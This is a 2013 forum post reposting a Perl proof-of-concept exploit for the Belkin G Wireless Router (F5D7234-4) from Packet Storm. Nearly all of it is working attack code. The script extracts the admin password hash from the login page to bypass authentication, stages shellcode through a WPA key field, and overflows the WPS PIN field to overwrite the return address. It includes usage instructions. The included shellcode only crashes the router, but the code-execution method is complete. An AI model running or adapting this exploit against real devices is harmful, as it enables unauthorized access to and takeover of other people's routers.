Matt Posted August 27, 2013 Report Posted August 27, 2013 Description : Belkin G Wireless Router remote code execution proof of concept exploit.Author : AodrulezSource : Belkin G Wireless Router Code Execution ? Packet StormCode : +-----------------------------------+| Belkin G Wireless Router RCE PoC. |+-----------------------------------+Firmware Version : 5.00.12 (Sep 10 2009 19:54:12)Boot Version : 1.18Hardware : F5D7234-4 v5 (01)Author : Aodrulez.Email : atul.alex@orchidseven.comTwitter :| Details |+---------+The exploit works in 3 stages.1. Authentication.2. Setting up shellcode in the memory at a known location.3. Triggering an RA register over-write to execute the shellcode.This particular model of router is based on 'embedded Configurable operating system' a.k.a (eCos) version 2.0. The shellcode used in the exploit is a dummy one that basically just triggers an exception & crashes the router, forcing it to reboot.Video Demo :| Exploit |+---------+#!/usr/bin/perluse strict;use warnings;use LWP 5.64;$| = 1;# Variable $browser = LWP::UserAgent->new;my $passHash="";my $url ="";my $response ="";my $ip="";$browser ->timeout(10);# Just a few nops followed by a dummy shellcode that crashes & reboots the $shellcode="\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x04\xd0\xff\xff\x20\x20\x20\x20";sub Authenticate(){ print "[+] Trying to authenticate.\n"; $url= "http://$ip/login.stm"; $response = $browser->get( $url); my @aod= $response->content =~ m/var password = "(.*)";/g; if(!$aod[0]) { print "[-] Damn! Something went wrong. This might not work here \n"; exit; } else { $passHash=$aod[0]; print "[+] Admin Password = $passHash (MD5 Hash).\n"; } print "[+] Time to authenticate you!\n"; $url = "http://$ip/cgi-bin/login.exe"; $response = $browser->post( $url, [ 'totalMSec' => "1377121454.99", 'pws' => "$passHash", ,] ); if( $response->content =~ /index/ ) { print "[+] Logged in successfully as 'Admin'!\n"; print "[!] Open this link in a browser for admin access : http://$ip/setup.htm \n"; } else { print "[-] Login failed! This might not work here \n"; exit; } print "\n[+] Continue with exploitation? (Y/N) : "; my $temp=<STDIN>; if ($temp=~"Y" || $temp=~"y") { Exploit(); } else { print "[+] Have fun!\n\n"; exit; }}sub Exploit(){# Stage 1: Fill shellcode at a known location : 0x803c0278 (Buffer=120 bytes)# 0x803c0278 is fixed for this device/firmware combination. print "[+] Stage 1 : Allocating shellcode.\n"; if (length($shellcode) > 120) { print "[-] Shellcode is too big! (120 bytes Max)\n"; exit; } print "[+] Shellcode length : ".length($shellcode)."\n"; # Fill the rest with nops. Not needed but good to have. # Shellcode size should be ideally a multiple of 4 as this is MIPS. my $nopsize=120-length($shellcode); $shellcode=$shellcode.("\x20"x$nopsize); $url = "http://$ip/cgi-bin/wireless_WPA.exe"; $response = $browser->post( $url, [ 'wpa_authen' => "1", 'wpa_psk' => '0', 's_rekeysec' => '900000', 's_rekeypkt' => '1000', 'w802_rekey' => '0', 'encryption' => '3', 'security_type' => '4', 'authentication' => '3', 'encryption_hid' => '3', 'wpa_key_text' => "ssss", 'wpa_key_pass' => "$shellcode", 'obscure_psk' => '1', 'sharedkey_alter' => '', 'sharedkey_alter1' => '1', ,] ); if( !$response->content ) { print "[-] Damn! Something went wrong. This might not work here \n"; } else { print "[+] Stage 1 seems to have gone well.\n"; }# Stage 2: Trigger Stack Overflow & overwrite RAprint "[+] Stage 2 : Triggering Return Address overwrite.\n";my $junk="A"x32;my $s0="BBBB";my $s1="CCCC";my $ra="\x78\x02\x3c\x80"; #EPC -> 0x803c0278 Fixed for this device/firmware $nop="\x20\x20\x20\x20";my $payload=$junk.$s0.$s1.$ra.$nop; $url = "http://$ip/cgi-bin/wireless_WPS_Enroll.exe"; $response = $browser->post( $url,[ 'pin' => "$payload"]); if( !$response->content ) { print "[-] Damn! Something went wrong. This might not work here \n"; } else { print "[-] Done! \\m/\n"; }}sub Welcome(){ print "\n\n+------------------------------------------+\n"; print "| Belkin G Wireless Router Remote Exploit |\n"; print "| (Authentication bypass & RCE PoC) |\n"; print "+------------------------------------------+\n"; print "[+] By Aodrulez.\n"; print "\n[+] Usage : perl $0 router_ip"; print "\n[!] Example : perl $0"; if (!$ARGV[0]) { print "\n[-] (o_0) Seriously??\n"; exit; } $ip=$ARGV[0]; print "\n[+] Target IP : $ip\n";}# Burn!!Welcome();Authenticate();# End of exploit code.+-------------------+| Greetz Fly Out To |+-------------------+1] Amforked() : My Mentor.2] The Blue Genius : My Boss.3] str0ke (milw0rm)4] www.orchidseven.com5] www.malcon.org6]| Quote |+-------+“I would rather die of passion than of boredom.” - Vincent van Gogh. Quote